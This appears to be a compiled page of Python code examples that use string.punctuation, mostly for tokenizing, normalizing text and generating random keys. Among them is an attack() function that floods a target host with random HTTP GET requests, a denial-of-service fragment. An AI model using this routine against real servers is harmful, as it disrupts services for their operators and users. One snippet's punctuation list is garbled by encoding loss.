def test_bag_of_words_for_series():
    dataset = fetch_20newsgroups(shuffle=True, random_state=1,
                                 remove=('headers', 'footers', 'quotes'))
    series = XSeries(dataset.data[:10])
    assert series.data_type == str

    translator = str.maketrans('', '', string.punctuation)
    tokenizer_transformer = XSeriesTransformer(
        transform_function=lambda text: text.lower().translate(translator).strip().split()
    )

    transformed_series = tokenizer_transformer.fit_transform(series)
    # print(transformed_series)

    bag_transform = BagOfWordsTransformer()
    transformed_series = bag_transform.fit_transform(transformed_series)
    # print(transformed_series)

    assert type(transformed_series) == XDataFrame
Python string.punctuation usage examples (source code)
def __iter__(self):
    """
    Read a file where each line is of the form "word1 word2 ..."
    Yields lists of the form [word1, word2, ...]
    """
    if os.path.isdir(self.fname):
        filenames = [os.path.join(self.fname, f) for f in os.listdir(self.fname)]
    else:
        filenames = [self.fname]
    for filename in filenames:
        # with io.open(filename, encoding='utf-8') as f:
        with open(filename) as f:
            doc = f.read()
        for line in doc.split("\n"):
            # if not line: continue
            sent = "".join([ch for ch in line.lower() if ch not in string.punctuation]).strip().split()
            # sent = [word for word in line.strip().split()]
            sent = [self.begin] + sent + [self.end]
            yield sent
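This iterator belongs to a small corpus class that wraps a file or directory of files, one sentence per line, and wraps each sentence with begin/end markers. A minimal hedged usage sketch follows; the class name and constructor arguments are assumptions, since the excerpt only shows the method body.

# Hypothetical usage -- "SentenceCorpus" and its constructor are assumptions:
#     corpus = SentenceCorpus(fname='data/corpus.txt', begin='<s>', end='</s>')
#     for sent in corpus:
#         print(sent)   # e.g. ['<s>', 'hello', 'world', '</s>']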
def __iter__(self):
    """
    Read a file where each line is of the form "word1 word2 ..."
    Yields lists of the form [word1, word2, ...]
    """
    if os.path.isdir(self.fname):
        filenames = [os.path.join(self.fname, f) for f in os.listdir(self.fname)]
    else:
        filenames = [self.fname]
    for langpath in filenames:
        with open(langpath) as f:
            doc = f.read()
        for line in doc.split("\n"):
            # if not line: continue
            sent = "".join([ch for ch in line.lower() if ch not in string.punctuation]).strip().split()
            # sent = [word for word in line.strip().split()]
            sent = [self.begin] + sent + [self.end]
            yield sent
def hexdump(src, length=16, sep='.'):
    """
    Displays a hex output of the content it is passed.

    This was based on https://gist.github.com/7h3rAm/5603718 with some
    minor modifications
    """
    allowed = digits + ascii_letters + punctuation + ' '
    print_map = ''.join(((x if x in allowed else '.')
                         for x in map(chr, range(256))))
    lines = []
    for c in xrange(0, len(src), length):
        chars = src[c:c + length]
        hex = ' '.join(["%02x" % ord(x) for x in chars])
        if len(hex) > 24:
            hex = "%s %s" % (hex[:24], hex[24:])
        printable = ''.join(["%s" % (
            (ord(x) <= 127 and print_map[ord(x)]) or sep) for x in chars])
        lines.append("%08x: %-*s |%s|" % (c, length * 3, hex, printable))
    return '\n'.join(lines)
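A brief usage sketch, hedged: the snippet is Python 2-style code (note `xrange` and `ord()` over string characters), so a Python 2 `str` input is assumed here.

# Assumes Python 2, where iterating over a str yields one-character strings.
print hexdump("GET / HTTP/1.1\r\n")
# Produces lines roughly of the form:
# 00000000: 47 45 54 20 2f 20 48 54  54 50 2f 31 2e 31 0d 0a |GET / HTTP/1.1..|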
def attack():
    ip = socket.gethostbyname( host )
    global n
    msg = str(string.letters + string.digits + string.punctuation)
    data = "".join(random.sample(msg, 5))
    dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        n += 1
        dos.connect((ip, port))
        dos.send( "GET /%s HTTP/1.1\r\n" % data )
        print "\n "+time.ctime().split(" ")[3]+" "+"["+str(n)+"] #-#-# Hold Your Tears #-#-#"
    except socket.error:
        print "\n [ No connection! Server maybe down ] "
    dos.close()
SentenceComparator.py (project: scientific-paper-summarisation, author: EdCo95)
def removeCommonWords(self, sentence, common_words, tokenized=False):
    """Takes a sentence and list of stopwords and removes the stopwords from the sentence."""
    if not tokenized:
        words = sentence.split(' ')
    else:
        words = sentence
    final_sentence = []
    for word in words:
        word = word.translate(string.maketrans("", ""), string.punctuation)
        word = word.lower()
        if word in common_words:
            continue
        else:
            final_sentence.append(word)
    return final_sentence
def ex3(argv):
    password = ''
    for i in range(len(argv)):
        for j in range(int(argv[i])):
            if i == 0:
                password += string.uppercase[random.randint(0, len(string.uppercase)-1)]
            elif i == 1:
                password += string.lowercase[random.randint(0, len(string.lowercase)-1)]
            elif i == 2:
                password += string.digits[random.randint(0, len(string.digits)-1)]
            elif i == 3:
                password += string.punctuation[random.randint(0, len(string.punctuation)-1)]
    return ''.join(random.sample(password, len(password)))
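A brief usage sketch, hedged: the snippet targets Python 2 (where `string.uppercase` and `string.lowercase` exist). Each positional argument gives how many characters to draw from the corresponding class, in the order uppercase, lowercase, digits, punctuation.

# 3 uppercase, 4 lowercase, 2 digits, 1 punctuation character, then shuffled.
print ex3(['3', '4', '2', '1'])   # e.g. 'k!xQw2Rba7' (output is random)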
def mark(line):
    tmp_line = ''
    for c in line:
        if c in string.punctuation:
            if c != "'":   # compare by value, not identity
                tmp_line += ' ' + c + ' '
            else:
                tmp_line += ' ' + c
        else:
            tmp_line += c
    tmp_line = tmp_line.lower()
    words = [w for w in tmp_line.split() if len(w) > 0]
    for w in words:
        if w not in word2freq:
            word2freq[w] = 1
        else:
            word2freq[w] += 1
    return words
def _normalize_answer(s):
    """Normalize string to score answers according to SQuAD dataset scoring rules.

    Remove articles, remove punctuation, fix multiple whitespaces in string,
    and convert all characters to lowercase.
    """
    def remove_articles(text):
        return re.sub(r'\b(a|an|the)\b', ' ', text)

    def white_space_fix(text):
        return ' '.join(text.split())

    def remove_punc(text):
        exclude = set(string.punctuation)
        return ''.join(ch for ch in text if ch not in exclude)

    def lower(text):
        return text.lower()

    return white_space_fix(remove_articles(remove_punc(lower(s))))
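For illustration, the normalization lowercases the text, strips punctuation and articles, and collapses whitespace:

_normalize_answer("The Quick,  Brown Fox!")   # -> 'quick brown fox'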
def tiny_tokenize(text, stem=False, stop_words=[]):
    words = []
    for token in wordpunct_tokenize(re.sub('[%s]' % re.escape(string.punctuation), ' ',
                                           text.decode(encoding='UTF-8', errors='ignore'))):
        if not token.isdigit() and not token in stop_words:
            if stem:
                try:
                    w = EnglishStemmer().stem(token)
                except Exception as e:
                    w = token
            else:
                w = token
            words.append(w)
    return words

# return [EnglishStemmer().stem(token) if stem else token for token in wordpunct_tokenize(
#     re.sub('[%s]' % re.escape(string.punctuation), ' ', text.decode(encoding='UTF-8', errors='ignore'))) if
#     not token.isdigit() and not token in stop_words]
def _extract_values_from_rpdr_notes(
        rpdr_notes, phrase_type, phrases, ignore_punctuation,
        show_n_words_context_before, show_n_words_context_after):
    """Return a list of NotePhraseMatches for each note in rpdr_notes."""
    note_phrase_matches = []
    if ignore_punctuation:
        logging.info('ignore_punctuation is True, so we will also ignore '
                     'any punctuation in the entered phrases.')
        phrases = [_remove_punctuation(phrase) for phrase in phrases]
    match_contexts = PhraseMatchContexts(
        show_n_words_context_before, show_n_words_context_after)
    for rpdr_note in rpdr_notes:
        if ignore_punctuation:
            rpdr_note.remove_punctuation_from_note()
        phrase_matches = _extract_phrase_from_notes(phrase_type, phrases,
                                                    rpdr_note, match_contexts)
        note_phrase_matches.append(phrase_matches)
    match_contexts.print_ordered_contexts()
    return note_phrase_matches
def _words_plus_punc(self):
    """
    Returns mapping of form:
    {
        'cat,': 'cat',
        ',cat': 'cat',
    }
    """
    no_punc_text = REGEX_REMOVE_PUNCTUATION.sub('', self.text)
    # removes punctuation (but loses emoticons & contractions)
    words_only = no_punc_text.split()
    # remove singletons
    words_only = set(w for w in words_only if len(w) > 1)
    # the two products give (',', 'cat') and ('cat', ',') pairs respectively
    punc_before = {''.join(p): p[1] for p in product(PUNC_LIST, words_only)}
    punc_after = {''.join(p): p[0] for p in product(words_only, PUNC_LIST)}
    words_punc_dict = punc_before
    words_punc_dict.update(punc_after)
    return words_punc_dict
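A minimal standalone sketch of the same idea, useful for seeing what the mapping looks like. PUNC_LIST and REGEX_REMOVE_PUNCTUATION are module-level constants in the original; the values below are assumptions.

from itertools import product

PUNC_LIST = ['.', ',', '!', '?']   # assumed subset of the real constant
words_only = {'cat', 'dog'}

punc_before = {''.join(p): p[1] for p in product(PUNC_LIST, words_only)}
punc_after = {''.join(p): p[0] for p in product(words_only, PUNC_LIST)}
mapping = {**punc_before, **punc_after}
# mapping now contains entries such as {',cat': 'cat', 'cat,': 'cat', '!dog': 'dog', ...}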
def ping(self, user, text=None):
    """Measure round-trip delay to another IRC client.
    """
    if self._pings is None:
        self._pings = {}

    if text is None:
        chars = string.letters + string.digits + string.punctuation
        key = ''.join([random.choice(chars) for i in range(12)])
    else:
        key = str(text)
    self._pings[(user, key)] = time.time()
    self.ctcpMakeQuery(user, [('PING', key)])

    if len(self._pings) > self._MAX_PINGRING:
        # Remove some of the oldest entries.
        byValue = [(v, k) for (k, v) in self._pings.items()]
        byValue.sort()
        excess = len(self._pings) - self._MAX_PINGRING
        for i in xrange(excess):
            del self._pings[byValue[i][1]]
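A short hedged note on usage: this method comes from a Twisted-style IRC client mixin, so it is called on the client instance; the nickname below is an assumption.

# Inside an IRCClient subclass (e.g. after joining a channel):
#     self.ping('SomeNick')              # sends a CTCP PING with a random 12-char key
#     self.ping('SomeNick', text='abc')  # uses the given text as the key instead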
NewsAutosummarize.py (project: Python-Scripts-Repo-on-Data-Science, author: qalhata)
def __init__(self, min_cut=0.1, max_cut=0.9):
    # The constructor runs each time an object of the frequency-summarizer
    # class is instantiated; it stores the two cut-off parameters as member
    # variables (the 'self.' prefix marks them as belonging to the instance).
    self._min_cut = min_cut
    self._max_cut = max_cut
    # Set of all common English stopwords plus punctuation symbols.
    self._stopwords = set(stopwords.words('english') + list(punctuation))
    # Note: a variable defined at class level (outside any member function)
    # would be static, i.e. shared by the class rather than owned by any
    # individual instance.
def normalize_answer(s):
    """Lower text and remove punctuation, articles and extra whitespace."""
    def remove_articles(text):
        return re.sub(r'\b(a|an|the)\b', ' ', text)

    def white_space_fix(text):
        return ' '.join(text.split())

    def remove_punc(text):
        exclude = set(string.punctuation)
        return ''.join(ch for ch in text if ch not in exclude)

    def lower(text):
        return text.lower()

    return white_space_fix(remove_articles(remove_punc(lower(s))))
def lemmatize_text(text, stop_words=STOPLIST, keep_pos=KEEP_POS):
    '''
    Function to lemmatize a single document of the corpus.

    INPUT:
        text: string, text of review
        stop_words: words to remove from text, default STOPLIST defined above
        keep_pos: parts of speech to keep in text, default KEEP_POS defined above
    OUTPUT:
        lemmatized text
    '''
    x = nlp(text)
    words = [tok.lemma_.strip(punctuation) for tok in x if (
        tok.pos_ in keep_pos) and (tok.lemma_.strip(punctuation) not in stop_words)]
    words.extend(['boss' for tok in x if tok.lemma_ == 'bos'])
    return ' '.join(words)
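A hedged usage sketch: `nlp` in the function above is a preloaded spaCy pipeline, and STOPLIST/KEEP_POS are module-level constants in the original project; the model name and values shown here are assumptions, not taken from that project.

import spacy
from string import punctuation

nlp = spacy.load('en_core_web_sm')            # assumed model name
STOPLIST = {'the', 'a', 'an', 'and'}          # assumed stopword set
KEEP_POS = {'NOUN', 'VERB', 'ADJ', 'ADV'}     # assumed POS whitelist

print(lemmatize_text("The managers were reviewing the quarterly reports."))
# e.g. 'manager review quarterly report' (exact output depends on the spaCy model)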
def header_link(title):
    """Return a github-style link target for a title.

    >>> header_link('Hello there!')
    'hello-there'
    """
    # This doesn't do the-title-1, the-title-2 etc. with multiple titles
    # with same text, but usually this doesn't matter.
    result = ''
    for character in title:
        if character in string.whitespace:
            result += '-'
        elif character in string.punctuation:
            pass
        else:
            result += character.lower()
    return result
def header_link(title):
    """Return a github-style link target for a title.

    >>> header_link('Hello there!')
    'hello-there'
    """
    # This doesn't handle multiple titles with the same text in the
    # same file, but usually that's not a problem. GitHub makes
    # links like the-title, the-title-1, the-title-2 etc.
    result = ''
    for character in title:
        if character in string.whitespace:
            result += '-'
        elif character in string.punctuation:
            pass
        else:
            result += character.lower()
    return result
async def _bots(self, ctx, amount: int = 100):
    """Clears bots and bot calls."""
    def check(m):
        if m.author.bot:
            return True
        for mem in m.mentions:
            if mem.bot:
                return True
        if (m.content.startswith(tuple(i for i in string.punctuation))
                and not bool(re.search(r'^<@!?(\d+)>', m.content))):
            return True
        return False

    messages = await self.bot.purge_from(ctx.message.channel, limit=amount, before=ctx.message, check=check)
    await self.bot.delete_message(ctx.message)
    send = await self.bot.say("Successfully cleared **{}** messages".format(len(messages)))
    await asyncio.sleep(3)
    await self.bot.delete_message(send)
def could_be(self, other):
    """Return True if the other PersonName is not explicitly inconsistent."""
    # TODO: Some suffix and title differences should be allowed
    if type(other) is not type(self):
        return NotImplemented
    if self == other:
        return True
    for attr in ['title', 'firstname', 'middlename', 'nickname', 'prefix', 'lastname', 'suffix']:
        if attr not in self or attr not in other:
            continue
        puncmap = dict((ord(char), None) for char in string.punctuation)
        s = self[attr].lower().translate(puncmap)
        o = other[attr].lower().translate(puncmap)
        if s == o:
            continue
        if attr in {'firstname', 'middlename', 'lastname'}:
            # Allow an initials-only form to match the corresponding full form,
            # e.g. 'j r' could be 'john robert'.
            if (({len(comp) for comp in s.split()} == {1} and [el[0] for el in o.split()] == s.split()) or
                    ({len(comp) for comp in o.split()} == {1} and [el[0] for el in s.split()] == o.split())):
                continue
        return False
    return True
Sentiment Analysis.py (project: Twitter-Sentiment-Analysis-For-Birthday-Celebrities, author: vishal-tiwari)
def posNegCount(self, tweet):
    pos = 0
    neg = 0
    for p in list(punctuation):
        tweet = tweet.replace(p, '')
    tweet = tweet.lower()
    words = tweet.split(' ')
    word_count = len(words)
    for word in words:
        if word in self.positive_words:
            pos = pos + 1
        elif word in self.negative_words:
            neg = neg + 1
    return pos, neg
def LemNormalize(text):
    # convert non-ascii characters
    text = text.encode('ascii', 'replace').decode()
    # remove punctuation and digits
    remove_punct_and_digits = dict([(ord(punct), ' ') for punct in string.punctuation + string.digits])
    transformed = text.lower().translate(remove_punct_and_digits)
    # shortword = re.compile(r'\W*\b\w{1,2}\b')
    # transformed = shortword.sub('', transformed)
    # tokenize the transformed string
    tokenized = nltk.word_tokenize(transformed)
    # remove short words (3 characters or fewer)
    tokenized = [w for w in tokenized if len(w) > 3]
    tokenizer = LemTokens(tokenized)
    return tokenizer
def LemNormalizeIt(text):
    # convert non-ascii characters
    text = text.encode('ascii', 'replace').decode()
    # remove punctuation and digits
    remove_punct_and_digits = dict([(ord(punct), ' ') for punct in string.punctuation + string.digits])
    transformed = text.lower().translate(remove_punct_and_digits)
    # tokenize the transformed string
    tokenized = nltk.word_tokenize(transformed)
    # apply lemming with morph-it
    morph_it = load_morph_it()
    tokenized = [morph_it.get(w, w) for w in tokenized if len(w) > 3]
    return tokenized
def preprocessing(content):
    remove_punc = ('? ? ? ? ? ? ? ? ? —').split(' ')
    ## preprocessing #1 : remove XXenglishXX and numbers
    preprocessing_1 = re.compile(r'\d*', re.L)   ## only substitute numbers
    #preprocessing_1 = re.compile(r'\w*', re.L)  ## substitute number & English
    content = preprocessing_1.sub("", content)
    ## preprocessing #2 : remove punctuation
    preprocessing_2 = re.compile('[%s]' % re.escape(string.punctuation))
    content = preprocessing_2.sub("", content)
    ## preprocessing #3 : remove Chinese punctuation and multiple whitespaces
    content = content.replace('\n', '')
    for punc in remove_punc:
        content = content.replace(punc, '')
    try:
        content = parsing.strip_multiple_whitespaces(content)
    except:
        print 'Warning : failed to strip whitespaces @ '
    return content
def get_anilist_links(title):
    """Iterates through all search methods until link is constructed"""
    exclude = set(string.punctuation)
    title = ''.join(ch for ch in title if ch not in exclude)
    title = title.lower().split(' ')
    if 'season' in title:
        title.remove('season')
    title = ' '.join(title)
    anilist_regex = re.compile(r'http(s)?://anilist.co/anime/([0-9]){1,5}(/.*)?')
    link_dispatcher = {'api': _get_anilist_link_by_api}
    for _, v in link_dispatcher.items():
        anilist_url = v(title)
        if anilist_url is None:
            continue
        if re.match(anilist_regex, anilist_url) is not None:
            return anilist_url
    return
def search_crunchyroll(anime):
    """Searches if anime exists on Crunchyroll and returns a link"""
    try:
        exclude = set(string.punctuation)
        anime = ''.join(ch for ch in anime if ch not in exclude)
        keywords = anime.split(' ')
        crunchy_api = MetaApi()
        crunchyroll_listing = []
        while len(keywords) > 0:
            crunchyroll_listing = list(crunchy_api.search_anime_series(' '.join(keywords)))
            if len(crunchyroll_listing) <= 0:
                print('No crunchyroll listings found')
                keywords.pop()
                continue
            else:
                break
    except:
        print('Crunchyroll url couldn\'t be retrieved')
        return
    return crunchyroll_listing[0].url if len(crunchyroll_listing) > 0 else None
def search_funimation(anime):
    """Checks if anime exists on Funimation website and returns a link"""
    try:
        exclude = set(string.punctuation)
        anime = ''.join(ch for ch in anime if ch not in exclude)
        keywords = anime.split(' ')
        funi_url = None
        while len(keywords) > 0:
            show_slug = '-'.join(keywords).lower()
            funi_url = f'https://www.funimation.com/shows/{show_slug}/'
            funi_url = utilities.make_get_request(funi_url)
            if funi_url is None:
                keywords.pop()
                continue
            else:
                break
    except:
        print('Funimation url couldn\'t be retrieved')
        return
    return funi_url.url if funi_url is not None else None
def search_animelab(anime):
    """Checks if anime title exists on AnimeLab website and returns a link"""
    try:
        exclude = set(string.punctuation)
        anime = ''.join(ch for ch in anime if ch not in exclude)
        keywords = anime.split(' ')
        animelab_url = None
        while len(keywords) > 0:
            show_slug = '-'.join(keywords).lower()
            animelab_url = f'https://www.animelab.com/shows/{show_slug}'
            animelab_url = utilities.make_get_request(animelab_url)
            if animelab_url is None:
                keywords.pop()
                return
            else:
                break
    except:
        print('Animelab url couldn\'t be retrieved')
        return
    return animelab_url.url
def __init__(self, clean_config=None):
    self.cc = {
        'lower': False,
        'punctuation': False,
        'whitespace': False,
        'digit': False,
    }
    # Override clean config and validation check
    if clean_config != None:
        for key, value in clean_config.iteritems():
            if key in self.cc:
                if value not in [True, False, 1, 0]:
                    print ("Invalid: Incorrect boolean value: " + str(value) + " for key: " + str(key))
                else:
                    self.cc[key] = value
            else:
                print ("Invalid: Cleaner not recognized: " + str(key) + ", available Cleaners: " +
                       ", ".join(self.cc.keys()))
    cleaners_applied = [key for key in self.cc if self.cc[key]]
    if cleaners_applied:
        print ("Applying Cleaners: " + ", ".join(cleaners_applied))
    else:
        print ("Warning: No cleaners in config")